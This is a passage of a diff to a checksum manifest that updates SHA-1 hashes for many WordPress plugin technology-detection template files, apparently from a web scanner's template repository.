-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 